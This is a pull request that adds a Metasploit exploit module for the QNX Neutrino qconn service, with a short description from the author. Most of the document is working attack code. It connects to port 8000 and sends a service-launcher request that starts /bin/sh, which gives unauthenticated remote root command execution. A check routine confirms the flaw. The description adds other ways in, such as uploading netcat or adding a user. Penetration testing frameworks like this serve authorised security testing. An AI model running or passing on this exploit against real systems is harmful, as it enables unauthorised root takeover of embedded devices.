### PR TITLE
Add QNX QCOMM command execution module

### DIFF
--- a/modules/exploits/unix/misc/qnx_qconn_exec.rb
+++ b/modules/exploits/unix/misc/qnx_qconn_exec.rb
@@ -1,0 +1,115 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "QNX QCONN Remote Command Execution Vulnerability",
+			'Description'    => %q{
+				This module exploits a vulnerability in the qconn component of
+				QNX Neutrino which can be abused to allow unauthenticated users to
+				execute arbitrary commands under the context of the 'root' user.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'David Odell', # Discovery
+					'Mor!p3r <moriper[at]gmail.com>', # PoC
+					'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+				],
+			'References'     =>
+				[
+					['EDB',   '21520'],
+					['URL',   'http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos'],
+					['URL',   'http://www.qnx.com/developers/docs/6.3.0SP3/neutrino/utilities/q/qconn.html'],
+				],
+			'Payload'        =>
+				{
+					'BadChars'    => '',
+					'DisableNops' => true,
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd_interact',
+							'ConnectionType' => 'find',
+						},
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction' => 'none',
+					'PAYLOAD'      => 'cmd/unix/interact',
+				},
+			'Platform'       => 'unix',    # QNX Neutrino
+			'Arch'           => ARCH_CMD,
+			'Targets'        =>
+				[
+					# Tested on QNX Neutrino 6.5 SP1
+					['Automatic Targeting', { 'auto' => true }]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Sep 4 2012',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				Opt::RPORT(8000)
+			], self.class)
+	end
+
+	def check
+
+		@peer = "#{rhost}:#{rport}"
+
+		# send check
+		fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
+		print_status("#{@peer} - Sending check")
+		connect
+		req  = "service launcher\n"
+		req << "start/flags run /bin/echo /bin/echo #{fingerprint}\n"
+		sock.put(req)
+		res  = sock.get
+		disconnect
+
+		# check response
+		if    res and res =~ /#{fingerprint}/
+			return Exploit::CheckCode::Vulnerable
+		elsif res and res =~ /QCONN/
+			return Exploit::CheckCode::Detected
+		else
+			return Exploit::CheckCode::Unknown
+		end
+
+	end
+
+	def exploit
+
+		@peer = "#{rhost}:#{rport}"
+
+		# send payload
+		req  = "service launcher\n"
+		req << "start/flags run /bin/sh -\n"
+		print_status("#{@peer} - Sending payload (#{req.length} bytes)")
+		connect
+		sock.put(req)
+		res  = sock.get
+
+		# check response
+		if res and res =~ /No controlling tty/
+			print_good("#{@peer} - Payload sent successfully")
+		else
+			print_error("#{@peer} - Sending payload failed")
+		end
+		handler
+		disconnect
+
+	end
+end


### PR DESCRIPTION
Add QNX QCOMM command execution exploit module.
- Unauthenticated
- Remote root
- Tested on:
  - QNX Neutrino 6.5
  - QNX Neutrino 6.5 SP1

`GoodRanking` because sometimes Metasploit doesn't catch the interactive shell. Sending the raw payload with netcat works 100% reliably. The shell is returned, as per the `Payload sent successfully` condition. I have no idea why this fails in Metasploit.

This module uses `cmd_interactive` as the usual bash reverse shell tricks don't work on QNX (no /dev/tcp or /dev/inet) and there's no python/perl/ruby/php/netcat/etc. There are a few alternatives however they're all terrible:
- Use the `upload` feature (as opposed to `run`) to upload netcat.
- Write a binary to file and execute it.
- Add a user, then connect again with telnet.
- Hard-code the payload as `cmd/unix/generic`.

![QNX QCOMM command execution exploit](http://whatweb.net/qnx-exploit.png)
